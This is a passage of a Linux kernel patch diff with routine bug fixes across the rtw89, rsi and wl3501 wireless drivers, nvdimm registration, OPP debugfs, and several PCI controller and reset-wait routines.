+ 	mutex_init(&rtwdev->mutex);
+@@ -3149,6 +3151,7 @@ int rtw89_core_init(struct rtw89_dev *rtwdev)
+ 	ret = rtw89_load_firmware(rtwdev);
+ 	if (ret) {
+ 		rtw89_warn(rtwdev, "no firmware loaded\n");
++		destroy_workqueue(rtwdev->txq_wq);
+ 		return ret;
+ 	}
+ 	rtw89_ser_init(rtwdev);
+diff --git a/drivers/net/wireless/realtek/rtw89/debug.c b/drivers/net/wireless/realtek/rtw89/debug.c
+index 8297e35bfa52b..6730eea930ece 100644
+--- a/drivers/net/wireless/realtek/rtw89/debug.c
++++ b/drivers/net/wireless/realtek/rtw89/debug.c
+@@ -615,6 +615,7 @@ rtw89_debug_priv_mac_reg_dump_select(struct file *filp,
+ 	struct seq_file *m = (struct seq_file *)filp->private_data;
+ 	struct rtw89_debugfs_priv *debugfs_priv = m->private;
+ 	struct rtw89_dev *rtwdev = debugfs_priv->rtwdev;
++	const struct rtw89_chip_info *chip = rtwdev->chip;
+ 	char buf[32];
+ 	size_t buf_size;
+ 	int sel;
+@@ -634,6 +635,12 @@ rtw89_debug_priv_mac_reg_dump_select(struct file *filp,
+ 		return -EINVAL;
+ 	}
+ 
++	if (sel == RTW89_DBG_SEL_MAC_30 && chip->chip_id != RTL8852C) {
++		rtw89_info(rtwdev, "sel %d is address hole on chip %d\n", sel,
++			   chip->chip_id);
++		return -EINVAL;
++	}
++
+ 	debugfs_priv->cb_data = sel;
+ 	rtw89_info(rtwdev, "select mac page dump %d\n", debugfs_priv->cb_data);
+ 
+diff --git a/drivers/net/wireless/realtek/rtw89/fw.c b/drivers/net/wireless/realtek/rtw89/fw.c
+index de1f23779fc62..3b7af8faca505 100644
+--- a/drivers/net/wireless/realtek/rtw89/fw.c
++++ b/drivers/net/wireless/realtek/rtw89/fw.c
+@@ -2665,8 +2665,10 @@ static int rtw89_append_probe_req_ie(struct rtw89_dev *rtwdev,
+ 
+ 		list_add_tail(&info->list, &scan_info->pkt_list[band]);
+ 		ret = rtw89_fw_h2c_add_pkt_offload(rtwdev, &info->id, new);
+-		if (ret)
++		if (ret) {
++			kfree_skb(new);
+ 			goto out;
++		}
+ 
+ 		kfree_skb(new);
+ 	}
+diff --git a/drivers/net/wireless/realtek/rtw89/fw.h b/drivers/net/wireless/realtek/rtw89/fw.h
+index 4d2f9ea9e0022..2e4ca1cc5cae9 100644
+--- a/drivers/net/wireless/realtek/rtw89/fw.h
++++ b/drivers/net/wireless/realtek/rtw89/fw.h
+@@ -3209,16 +3209,16 @@ static inline struct rtw89_fw_c2h_attr *RTW89_SKB_C2H_CB(struct sk_buff *skb)
+ 	le32_get_bits(*((const __le32 *)(c2h) + 5), GENMASK(25, 24))
+ 
+ #define RTW89_GET_MAC_C2H_MCC_RCV_ACK_GROUP(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(1, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(1, 0))
+ #define RTW89_GET_MAC_C2H_MCC_RCV_ACK_H2C_FUNC(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(15, 8))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(15, 8))
+ 
+ #define RTW89_GET_MAC_C2H_MCC_REQ_ACK_GROUP(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(1, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(1, 0))
+ #define RTW89_GET_MAC_C2H_MCC_REQ_ACK_H2C_RETURN(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(7, 2))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(7, 2))
+ #define RTW89_GET_MAC_C2H_MCC_REQ_ACK_H2C_FUNC(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(15, 8))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(15, 8))
+ 
+ struct rtw89_mac_mcc_tsf_rpt {
+ 	u32 macid_x;
+@@ -3232,30 +3232,30 @@ struct rtw89_mac_mcc_tsf_rpt {
+ static_assert(sizeof(struct rtw89_mac_mcc_tsf_rpt) <= RTW89_COMPLETION_BUF_SIZE);
+ 
+ #define RTW89_GET_MAC_C2H_MCC_TSF_RPT_MACID_X(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(7, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(7, 0))
+ #define RTW89_GET_MAC_C2H_MCC_TSF_RPT_MACID_Y(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(15, 8))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(15, 8))
+ #define RTW89_GET_MAC_C2H_MCC_TSF_RPT_GROUP(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(17, 16))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(17, 16))
+ #define RTW89_GET_MAC_C2H_MCC_TSF_RPT_TSF_LOW_X(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h) + 1), GENMASK(31, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 3), GENMASK(31, 0))
+ #define RTW89_GET_MAC_C2H_MCC_TSF_RPT_TSF_HIGH_X(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(31, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 4), GENMASK(31, 0))
+ #define RTW89_GET_MAC_C2H_MCC_TSF_RPT_TSF_LOW_Y(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h) + 3), GENMASK(31, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 5), GENMASK(31, 0))
+ #define RTW89_GET_MAC_C2H_MCC_TSF_RPT_TSF_HIGH_Y(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h) + 4), GENMASK(31, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 6), GENMASK(31, 0))
+ 
+ #define RTW89_GET_MAC_C2H_MCC_STATUS_RPT_STATUS(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(5, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(5, 0))
+ #define RTW89_GET_MAC_C2H_MCC_STATUS_RPT_GROUP(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(7, 6))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(7, 6))
+ #define RTW89_GET_MAC_C2H_MCC_STATUS_RPT_MACID(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(15, 8))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(15, 8))
+ #define RTW89_GET_MAC_C2H_MCC_STATUS_RPT_TSF_LOW(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h) + 1), GENMASK(31, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 3), GENMASK(31, 0))
+ #define RTW89_GET_MAC_C2H_MCC_STATUS_RPT_TSF_HIGH(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(31, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 4), GENMASK(31, 0))
+ 
+ #define RTW89_FW_HDR_SIZE 32
+ #define RTW89_FW_SECTION_HDR_SIZE 16
+diff --git a/drivers/net/wireless/realtek/rtw89/pci.c b/drivers/net/wireless/realtek/rtw89/pci.c
+index 1c4500ba777c6..0ea734c81b4f0 100644
+--- a/drivers/net/wireless/realtek/rtw89/pci.c
++++ b/drivers/net/wireless/realtek/rtw89/pci.c
+@@ -1384,7 +1384,7 @@ static int rtw89_pci_ops_tx_write(struct rtw89_dev *rtwdev, struct rtw89_core_tx
+ 	return 0;
+ }
+ 
+-static const struct rtw89_pci_bd_ram bd_ram_table[RTW89_TXCH_NUM] = {
++const struct rtw89_pci_bd_ram rtw89_bd_ram_table_dual[RTW89_TXCH_NUM] = {
+ 	[RTW89_TXCH_ACH0] = {.start_idx = 0,  .max_num = 5, .min_num = 2},
+ 	[RTW89_TXCH_ACH1] = {.start_idx = 5,  .max_num = 5, .min_num = 2},
+ 	[RTW89_TXCH_ACH2] = {.start_idx = 10, .max_num = 5, .min_num = 2},
+@@ -1399,11 +1399,24 @@ static const struct rtw89_pci_bd_ram bd_ram_table[RTW89_TXCH_NUM] = {
+ 	[RTW89_TXCH_CH11] = {.start_idx = 55, .max_num = 5, .min_num = 1},
+ 	[RTW89_TXCH_CH12] = {.start_idx = 60, .max_num = 4, .min_num = 1},
+ };
++EXPORT_SYMBOL(rtw89_bd_ram_table_dual);
++
++const struct rtw89_pci_bd_ram rtw89_bd_ram_table_single[RTW89_TXCH_NUM] = {
++	[RTW89_TXCH_ACH0] = {.start_idx = 0,  .max_num = 5, .min_num = 2},
++	[RTW89_TXCH_ACH1] = {.start_idx = 5,  .max_num = 5, .min_num = 2},
++	[RTW89_TXCH_ACH2] = {.start_idx = 10, .max_num = 5, .min_num = 2},
++	[RTW89_TXCH_ACH3] = {.start_idx = 15, .max_num = 5, .min_num = 2},
++	[RTW89_TXCH_CH8]  = {.start_idx = 20, .max_num = 4, .min_num = 1},
++	[RTW89_TXCH_CH9]  = {.start_idx = 24, .max_num = 4, .min_num = 1},
++	[RTW89_TXCH_CH12] = {.start_idx = 28, .max_num = 4, .min_num = 1},
++};
++EXPORT_SYMBOL(rtw89_bd_ram_table_single);
+ 
+ static void rtw89_pci_reset_trx_rings(struct rtw89_dev *rtwdev)
+ {
+ 	struct rtw89_pci *rtwpci = (struct rtw89_pci *)rtwdev->priv;
+ 	const struct rtw89_pci_info *info = rtwdev->pci_info;
++	const struct rtw89_pci_bd_ram *bd_ram_table = *info->bd_ram_table;
+ 	struct rtw89_pci_tx_ring *tx_ring;
+ 	struct rtw89_pci_rx_ring *rx_ring;
+ 	struct rtw89_pci_dma_ring *bd_ring;
+diff --git a/drivers/net/wireless/realtek/rtw89/pci.h b/drivers/net/wireless/realtek/rtw89/pci.h
+index 7d033501d4d95..1e19740db8c54 100644
+--- a/drivers/net/wireless/realtek/rtw89/pci.h
++++ b/drivers/net/wireless/realtek/rtw89/pci.h
+@@ -750,6 +750,12 @@ struct rtw89_pci_ch_dma_addr_set {
+ 	struct rtw89_pci_ch_dma_addr rx[RTW89_RXCH_NUM];
+ };
+ 
++struct rtw89_pci_bd_ram {
++	u8 start_idx;
++	u8 max_num;
++	u8 min_num;
++};
++
+ struct rtw89_pci_info {
+ 	enum mac_ax_bd_trunc_mode txbd_trunc_mode;
+ 	enum mac_ax_bd_trunc_mode rxbd_trunc_mode;
+@@ -785,6 +791,7 @@ struct rtw89_pci_info {
+ 	u32 tx_dma_ch_mask;
+ 	const struct rtw89_pci_bd_idx_addr *bd_idx_addr_low_power;
+ 	const struct rtw89_pci_ch_dma_addr_set *dma_addr_set;
++	const struct rtw89_pci_bd_ram (*bd_ram_table)[RTW89_TXCH_NUM];
+ 
+ 	int (*ltr_set)(struct rtw89_dev *rtwdev, bool en);
+ 	u32 (*fill_txaddr_info)(struct rtw89_dev *rtwdev,
+@@ -798,12 +805,6 @@ struct rtw89_pci_info {
+ 				struct rtw89_pci_isrs *isrs);
+ };
+ 
+-struct rtw89_pci_bd_ram {
+-	u8 start_idx;
+-	u8 max_num;
+-	u8 min_num;
+-};
+-
+ struct rtw89_pci_tx_data {
+ 	dma_addr_t dma;
+ };
+@@ -1057,6 +1058,8 @@ static inline bool rtw89_pci_ltr_is_err_reg_val(u32 val)
+ extern const struct dev_pm_ops rtw89_pm_ops;
+ extern const struct rtw89_pci_ch_dma_addr_set rtw89_pci_ch_dma_addr_set;
+ extern const struct rtw89_pci_ch_dma_addr_set rtw89_pci_ch_dma_addr_set_v1;
++extern const struct rtw89_pci_bd_ram rtw89_bd_ram_table_dual[RTW89_TXCH_NUM];
++extern const struct rtw89_pci_bd_ram rtw89_bd_ram_table_single[RTW89_TXCH_NUM];
+ 
+ struct pci_device_id;
+ 
+diff --git a/drivers/net/wireless/realtek/rtw89/reg.h b/drivers/net/wireless/realtek/rtw89/reg.h
+index 5324e645728bb..ca6f6c3e63095 100644
+--- a/drivers/net/wireless/realtek/rtw89/reg.h
++++ b/drivers/net/wireless/realtek/rtw89/reg.h
+@@ -3671,6 +3671,8 @@
+ #define RR_TXRSV_GAPK BIT(19)
+ #define RR_BIAS 0x5e
+ #define RR_BIAS_GAPK BIT(19)
++#define RR_TXAC 0x5f
++#define RR_TXAC_IQG GENMASK(3, 0)
+ #define RR_BIASA 0x60
+ #define RR_BIASA_TXG GENMASK(15, 12)
+ #define RR_BIASA_TXA GENMASK(19, 16)
+diff --git a/drivers/net/wireless/realtek/rtw89/rtw8852ae.c b/drivers/net/wireless/realtek/rtw89/rtw8852ae.c
+index 0cd8c0c44d19d..d835a44a1d0d0 100644
+--- a/drivers/net/wireless/realtek/rtw89/rtw8852ae.c
++++ b/drivers/net/wireless/realtek/rtw89/rtw8852ae.c
+@@ -44,6 +44,7 @@ static const struct rtw89_pci_info rtw8852a_pci_info = {
+ 	.tx_dma_ch_mask		= 0,
+ 	.bd_idx_addr_low_power	= NULL,
+ 	.dma_addr_set		= &rtw89_pci_ch_dma_addr_set,
++	.bd_ram_table		= &rtw89_bd_ram_table_dual,
+ 
+ 	.ltr_set		= rtw89_pci_ltr_set,
+ 	.fill_txaddr_info	= rtw89_pci_fill_txaddr_info,
+diff --git a/drivers/net/wireless/realtek/rtw89/rtw8852be.c b/drivers/net/wireless/realtek/rtw89/rtw8852be.c
+index 0ef2ca8efeb0e..ecf39d2d9f81f 100644
+--- a/drivers/net/wireless/realtek/rtw89/rtw8852be.c
++++ b/drivers/net/wireless/realtek/rtw89/rtw8852be.c
+@@ -46,6 +46,7 @@ static const struct rtw89_pci_info rtw8852b_pci_info = {
+ 				  BIT(RTW89_TXCH_CH10) | BIT(RTW89_TXCH_CH11),
+ 	.bd_idx_addr_low_power	= NULL,
+ 	.dma_addr_set		= &rtw89_pci_ch_dma_addr_set,
++	.bd_ram_table		= &rtw89_bd_ram_table_single,
+ 
+ 	.ltr_set		= rtw89_pci_ltr_set,
+ 	.fill_txaddr_info	= rtw89_pci_fill_txaddr_info,
+diff --git a/drivers/net/wireless/realtek/rtw89/rtw8852c_rfk.c b/drivers/net/wireless/realtek/rtw89/rtw8852c_rfk.c
+index 60cd676fe22c9..f3a07b0e672f7 100644
+--- a/drivers/net/wireless/realtek/rtw89/rtw8852c_rfk.c
++++ b/drivers/net/wireless/realtek/rtw89/rtw8852c_rfk.c
+@@ -337,7 +337,7 @@ static void _dack_reload_by_path(struct rtw89_dev *rtwdev,
+ 		(dack->dadck_d[path][index] << 14);
+ 	addr = 0xc210 + offset;
+ 	rtw89_phy_write32(rtwdev, addr, val32);
+-	rtw89_phy_write32_set(rtwdev, addr, BIT(1));
++	rtw89_phy_write32_set(rtwdev, addr, BIT(0));
+ }
+ 
+ static void _dack_reload(struct rtw89_dev *rtwdev, enum rtw89_rf_path path)
+@@ -1872,12 +1872,11 @@ static void _dpk_rf_setting(struct rtw89_dev *rtwdev, u8 gain,
+ 			       0x50101 | BIT(rtwdev->dbcc_en));
+ 		rtw89_write_rf(rtwdev, path, RR_MOD_V1, RR_MOD_MASK, RF_DPK);
+ 
+-		if (dpk->bp[path][kidx].band == RTW89_BAND_6G && dpk->bp[path][kidx].ch >= 161) {
++		if (dpk->bp[path][kidx].band == RTW89_BAND_6G && dpk->bp[path][kidx].ch >= 161)
+ 			rtw89_write_rf(rtwdev, path, RR_IQGEN, RR_IQGEN_BIAS, 0x8);
+-			rtw89_write_rf(rtwdev, path, RR_LOGEN, RR_LOGEN_RPT, 0xd);
+-		} else {
+-			rtw89_write_rf(rtwdev, path, RR_LOGEN, RR_LOGEN_RPT, 0xd);
+-		}
++
++		rtw89_write_rf(rtwdev, path, RR_LOGEN, RR_LOGEN_RPT, 0xd);
++		rtw89_write_rf(rtwdev, path, RR_TXAC, RR_TXAC_IQG, 0x8);
+ 
+ 		rtw89_write_rf(rtwdev, path, RR_RXA2, RR_RXA2_ATT, 0x0);
+ 		rtw89_write_rf(rtwdev, path, RR_TXIQK, RR_TXIQK_ATT2, 0x3);
+diff --git a/drivers/net/wireless/realtek/rtw89/rtw8852ce.c b/drivers/net/wireless/realtek/rtw89/rtw8852ce.c
+index 35901f64d17de..80490a5437df6 100644
+--- a/drivers/net/wireless/realtek/rtw89/rtw8852ce.c
++++ b/drivers/net/wireless/realtek/rtw89/rtw8852ce.c
+@@ -53,6 +53,7 @@ static const struct rtw89_pci_info rtw8852c_pci_info = {
+ 	.tx_dma_ch_mask		= 0,
+ 	.bd_idx_addr_low_power	= &rtw8852c_bd_idx_addr_low_power,
+ 	.dma_addr_set		= &rtw89_pci_ch_dma_addr_set_v1,
++	.bd_ram_table		= &rtw89_bd_ram_table_dual,
+ 
+ 	.ltr_set		= rtw89_pci_ltr_set_v1,
+ 	.fill_txaddr_info	= rtw89_pci_fill_txaddr_info_v1,
+diff --git a/drivers/net/wireless/rsi/rsi_91x_coex.c b/drivers/net/wireless/rsi/rsi_91x_coex.c
+index 8a3d86897ea8e..45ac9371f2621 100644
+--- a/drivers/net/wireless/rsi/rsi_91x_coex.c
++++ b/drivers/net/wireless/rsi/rsi_91x_coex.c
+@@ -160,6 +160,7 @@ int rsi_coex_attach(struct rsi_common *common)
+ 			       rsi_coex_scheduler_thread,
+ 			       "Coex-Tx-Thread")) {
+ 		rsi_dbg(ERR_ZONE, "%s: Unable to init tx thrd\n", __func__);
++		kfree(coex_cb);
+ 		return -EINVAL;
+ 	}
+ 	return 0;
+diff --git a/drivers/net/wireless/wl3501_cs.c b/drivers/net/wireless/wl3501_cs.c
+index 1b532e00a56fb..7fb2f95134760 100644
+--- a/drivers/net/wireless/wl3501_cs.c
++++ b/drivers/net/wireless/wl3501_cs.c
+@@ -1328,7 +1328,7 @@ static netdev_tx_t wl3501_hard_start_xmit(struct sk_buff *skb,
+ 	} else {
+ 		++dev->stats.tx_packets;
+ 		dev->stats.tx_bytes += skb->len;
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 
+ 		if (this->tx_buffer_cnt < 2)
+ 			netif_stop_queue(dev);
+diff --git a/drivers/nvdimm/bus.c b/drivers/nvdimm/bus.c
+index b38d0355b0ac3..5ad49056921b5 100644
+--- a/drivers/nvdimm/bus.c
++++ b/drivers/nvdimm/bus.c
+@@ -508,7 +508,7 @@ static void nd_async_device_unregister(void *d, async_cookie_t cookie)
+ 	put_device(dev);
+ }
+ 
+-void nd_device_register(struct device *dev)
++static void __nd_device_register(struct device *dev, bool sync)
+ {
+ 	if (!dev)
+ 		return;
+@@ -531,11 +531,24 @@ void nd_device_register(struct device *dev)
+ 	}
+ 	get_device(dev);
+ 
+-	async_schedule_dev_domain(nd_async_device_register, dev,
+-				  &nd_async_domain);
++	if (sync)
++		nd_async_device_register(dev, 0);
++	else
++		async_schedule_dev_domain(nd_async_device_register, dev,
++					  &nd_async_domain);
++}
++
++void nd_device_register(struct device *dev)
++{
++	__nd_device_register(dev, false);
+ }
+ EXPORT_SYMBOL(nd_device_register);
+ 
++void nd_device_register_sync(struct device *dev)
++{
++	__nd_device_register(dev, true);
++}
++
+ void nd_device_unregister(struct device *dev, enum nd_async_mode mode)
+ {
+ 	bool killed;
+diff --git a/drivers/nvdimm/dimm_devs.c b/drivers/nvdimm/dimm_devs.c
+index 1fc081dcf6315..6d3b03a9fa02a 100644
+--- a/drivers/nvdimm/dimm_devs.c
++++ b/drivers/nvdimm/dimm_devs.c
+@@ -624,7 +624,10 @@ struct nvdimm *__nvdimm_create(struct nvdimm_bus *nvdimm_bus,
+ 	nvdimm->sec.ext_flags = nvdimm_security_flags(nvdimm, NVDIMM_MASTER);
+ 	device_initialize(dev);
+ 	lockdep_set_class(&dev->mutex, &nvdimm_key);
+-	nd_device_register(dev);
++	if (test_bit(NDD_REGISTER_SYNC, &flags))
++		nd_device_register_sync(dev);
++	else
++		nd_device_register(dev);
+ 
+ 	return nvdimm;
+ }
+diff --git a/drivers/nvdimm/nd-core.h b/drivers/nvdimm/nd-core.h
+index cc86ee09d7c08..845408f106556 100644
+--- a/drivers/nvdimm/nd-core.h
++++ b/drivers/nvdimm/nd-core.h
+@@ -107,6 +107,7 @@ int nvdimm_bus_create_ndctl(struct nvdimm_bus *nvdimm_bus);
+ void nvdimm_bus_destroy_ndctl(struct nvdimm_bus *nvdimm_bus);
+ void nd_synchronize(void);
+ void nd_device_register(struct device *dev);
++void nd_device_register_sync(struct device *dev);
+ struct nd_label_id;
+ char *nd_label_gen_id(struct nd_label_id *label_id, const uuid_t *uuid,
+ 		      u32 flags);
+diff --git a/drivers/opp/debugfs.c b/drivers/opp/debugfs.c
+index 96a30a032c5f9..2c7fb683441ef 100644
+--- a/drivers/opp/debugfs.c
++++ b/drivers/opp/debugfs.c
+@@ -235,7 +235,7 @@ static void opp_migrate_dentry(struct opp_device *opp_dev,
+ 
+ 	dentry = debugfs_rename(rootdir, opp_dev->dentry, rootdir,
+ 				opp_table->dentry_name);
+-	if (!dentry) {
++	if (IS_ERR(dentry)) {
+ 		dev_err(dev, "%s: Failed to rename link from: %s to %s\n",
+ 			__func__, dev_name(opp_dev->dev), dev_name(dev));
+ 		return;
+diff --git a/drivers/pci/controller/dwc/pcie-qcom.c b/drivers/pci/controller/dwc/pcie-qcom.c
+index 77e5dc7b88ad4..7e23c74fb4230 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom.c
++++ b/drivers/pci/controller/dwc/pcie-qcom.c
+@@ -1534,8 +1534,19 @@ err_deinit:
+ 	return ret;
+ }
+ 
++static void qcom_pcie_host_deinit(struct dw_pcie_rp *pp)
++{
++	struct dw_pcie *pci = to_dw_pcie_from_pp(pp);
++	struct qcom_pcie *pcie = to_qcom_pcie(pci);
++
++	qcom_ep_reset_assert(pcie);
++	phy_power_off(pcie->phy);
++	pcie->cfg->ops->deinit(pcie);
++}
++
+ static const struct dw_pcie_host_ops qcom_pcie_dw_ops = {
+-	.host_init = qcom_pcie_host_init,
++	.host_init	= qcom_pcie_host_init,
++	.host_deinit	= qcom_pcie_host_deinit,
+ };
+ 
+ /* Qcom IP rev.: 2.1.0	Synopsys IP rev.: 4.01a */
+diff --git a/drivers/pci/controller/pcie-mt7621.c b/drivers/pci/controller/pcie-mt7621.c
+index ee7aad09d6277..63a5f4463a9f6 100644
+--- a/drivers/pci/controller/pcie-mt7621.c
++++ b/drivers/pci/controller/pcie-mt7621.c
+@@ -60,6 +60,7 @@
+ #define PCIE_PORT_LINKUP		BIT(0)
+ #define PCIE_PORT_CNT			3
+ 
++#define INIT_PORTS_DELAY_MS		100
+ #define PERST_DELAY_MS			100
+ 
+ /**
+@@ -369,6 +370,7 @@ static int mt7621_pcie_init_ports(struct mt7621_pcie *pcie)
+ 		}
+ 	}
+ 
++	msleep(INIT_PORTS_DELAY_MS);
+ 	mt7621_pcie_reset_ep_deassert(pcie);
+ 
+ 	tmp = NULL;
+diff --git a/drivers/pci/endpoint/functions/pci-epf-vntb.c b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+index 04698e7995a54..b7c7a8af99f4f 100644
+--- a/drivers/pci/endpoint/functions/pci-epf-vntb.c
++++ b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+@@ -652,6 +652,7 @@ err_alloc_mem:
+ /**
+  * epf_ntb_mw_bar_clear() - Clear Memory window BARs
+  * @ntb: NTB device that facilitates communication between HOST and VHOST
++ * @num_mws: the number of Memory window BARs that to be cleared
+  */
+ static void epf_ntb_mw_bar_clear(struct epf_ntb *ntb, int num_mws)
+ {
+diff --git a/drivers/pci/iov.c b/drivers/pci/iov.c
+index 952217572113c..b2e8322755c17 100644
+--- a/drivers/pci/iov.c
++++ b/drivers/pci/iov.c
+@@ -14,7 +14,7 @@
+ #include <linux/delay.h>
+ #include "pci.h"
+ 
+-#define VIRTFN_ID_LEN	16
++#define VIRTFN_ID_LEN	17	/* "virtfn%u\0" for 2^32 - 1 */
+ 
+ int pci_iov_virtfn_bus(struct pci_dev *dev, int vf_id)
+ {
+diff --git a/drivers/pci/pci-driver.c b/drivers/pci/pci-driver.c
+index a2ceeacc33eb6..7a19f11daca3a 100644
+--- a/drivers/pci/pci-driver.c
++++ b/drivers/pci/pci-driver.c
+@@ -572,7 +572,7 @@ static void pci_pm_default_resume_early(struct pci_dev *pci_dev)
+ 
+ static void pci_pm_bridge_power_up_actions(struct pci_dev *pci_dev)
+ {
+-	pci_bridge_wait_for_secondary_bus(pci_dev);
++	pci_bridge_wait_for_secondary_bus(pci_dev, "resume", PCI_RESET_WAIT);
+ 	/*
+ 	 * When powering on a bridge from D3cold, the whole hierarchy may be
+ 	 * powered on into D0uninitialized state, resume them to give them a
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 5641786bd0206..da748247061d2 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -167,9 +167,6 @@ static int __init pcie_port_pm_setup(char *str)
+ }
+ __setup("pcie_port_pm=", pcie_port_pm_setup);
+ 
+-/* Time to wait after a reset for device to become responsive */
+-#define PCIE_RESET_READY_POLL_MS 60000
+-
+ /**
+  * pci_bus_max_busnr - returns maximum PCI bus number of given bus' children
+  * @bus: pointer to PCI bus structure to search
+@@ -1174,7 +1171,7 @@ static int pci_dev_wait(struct pci_dev *dev, char *reset_type, int timeout)
+ 			return -ENOTTY;
+ 		}
+ 
+-		if (delay > 1000)
++		if (delay > PCI_RESET_WAIT)
+ 			pci_info(dev, "not ready %dms after %s; waiting\n",
+ 				 delay - 1, reset_type);
+ 
+@@ -1183,7 +1180,7 @@ static int pci_dev_wait(struct pci_dev *dev, char *reset_type, int timeout)
+ 		pci_read_config_dword(dev, PCI_COMMAND, &id);
+ 	}
+ 
+-	if (delay > 1000)
++	if (delay > PCI_RESET_WAIT)
+ 		pci_info(dev, "ready %dms after %s\n", delay - 1,
+ 			 reset_type);
+ 
+@@ -4941,24 +4938,31 @@ static int pci_bus_max_d3cold_delay(const struct pci_bus *bus)
+ /**
+  * pci_bridge_wait_for_secondary_bus - Wait for secondary bus to be accessible
+  * @dev: PCI bridge
++ * @reset_type: reset type in human-readable form
++ * @timeout: maximum time to wait for devices on secondary bus (milliseconds)
+  *
+  * Handle necessary delays before access to the devices on the secondary
+- * side of the bridge are permitted after D3cold to D0 transition.
++ * side of the bridge are permitted after D3cold to D0 transition
++ * or Conventional Reset.
+  *
+  * For PCIe this means the delays in PCIe 5.0 section 6.6.1. For
+  * conventional PCI it means Tpvrh + Trhfa specified in PCI 3.0 section
+  * 4.3.2.
++ *
++ * Return 0 on success or -ENOTTY if the first device on the secondary bus
++ * failed to become accessible.
+  */
+-void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
++int pci_bridge_wait_for_secondary_bus(struct pci_dev *dev, char *reset_type,
++				      int timeout)
+ {
+ 	struct pci_dev *child;
+ 	int delay;
+ 
+ 	if (pci_dev_is_disconnected(dev))
+-		return;
++		return 0;
+ 
+-	if (!pci_is_bridge(dev) || !dev->bridge_d3)
+-		return;
++	if (!pci_is_bridge(dev))
++		return 0;
+ 
+ 	down_read(&pci_bus_sem);
+ 
+@@ -4970,14 +4974,14 @@ void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
+ 	 */
+ 	if (!dev->subordinate || list_empty(&dev->subordinate->devices)) {
+ 		up_read(&pci_bus_sem);
+-		return;
++		return 0;
+ 	}
+ 
+ 	/* Take d3cold_delay requirements into account */
+ 	delay = pci_bus_max_d3cold_delay(dev->subordinate);
+ 	if (!delay) {
+ 		up_read(&pci_bus_sem);
+-		return;
++		return 0;
+ 	}
+ 
+ 	child = list_first_entry(&dev->subordinate->devices, struct pci_dev,
+@@ -4986,14 +4990,12 @@ void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
+ 
+ 	/*
+ 	 * Conventional PCI and PCI-X we need to wait Tpvrh + Trhfa before
+-	 * accessing the device after reset (that is 1000 ms + 100 ms). In
+-	 * practice this should not be needed because we don't do power
+-	 * management for them (see pci_bridge_d3_possible()).
++	 * accessing the device after reset (that is 1000 ms + 100 ms).
+ 	 */
+ 	if (!pci_is_pcie(dev)) {
+ 		pci_dbg(dev, "waiting %d ms for secondary bus\n", 1000 + delay);
+ 		msleep(1000 + delay);
+-		return;
++		return 0;
+ 	}
+ 
+ 	/*
+@@ -5010,11 +5012,11 @@ void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
+ 	 * configuration requests if we only wait for 100 ms (see
+ 	 * https://bugzilla.kernel.org/show_bug.cgi?id=203885).
+ 	 *
+-	 * Therefore we wait for 100 ms and check for the device presence.
+-	 * If it is still not present give it an additional 100 ms.
++	 * Therefore we wait for 100 ms and check for the device presence
++	 * until the timeout expires.
+ 	 */
+ 	if (!pcie_downstream_port(dev))
+-		return;
++		return 0;
+ 
+ 	if (pcie_get_speed_cap(dev) <= PCIE_SPEED_5_0GT) {
+ 		pci_dbg(dev, "waiting %d ms for downstream link\n", delay);
+@@ -5025,14 +5027,11 @@ void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
+ 		if (!pcie_wait_for_link_delay(dev, true, delay)) {
+ 			/* Did not train, no need to wait any further */
+ 			pci_info(dev, "Data Link Layer Link Active not set in 1000 msec\n");
+-			return;
++			return -ENOTTY;
+ 		}
+ 	}
+ 
+-	if (!pci_device_is_present(child)) {
+-		pci_dbg(child, "waiting additional %d ms to become accessible\n", delay);
+-		msleep(delay);
+-	}
++	return pci_dev_wait(child, reset_type, timeout - delay);
+ }
+ 
+ void pci_reset_secondary_bus(struct pci_dev *dev)
